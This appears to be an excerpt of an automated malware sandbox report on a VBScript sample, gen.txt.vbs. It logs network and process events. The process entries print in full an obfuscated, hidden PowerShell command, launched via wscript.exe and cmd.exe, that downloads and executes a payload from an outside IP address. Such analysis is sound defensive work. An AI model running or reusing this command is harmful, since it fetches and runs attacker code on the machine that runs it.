send Sept. 5, 2023, 8:55 a.m.	buffer: GET /coder.jpg HTTP/1.1 Host: 45.138.16.89:222 Connection: Keep-Alive socket: 1416 sent: 75	1	75	0

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://45.138.16.89:222/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
parent_process	wscript.exe				martian_process	"C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://45.138.16.89:222/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

Creates a suspicious Powershell process (12 events)

option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user
option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user
option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\cmd.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

gen.txt.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All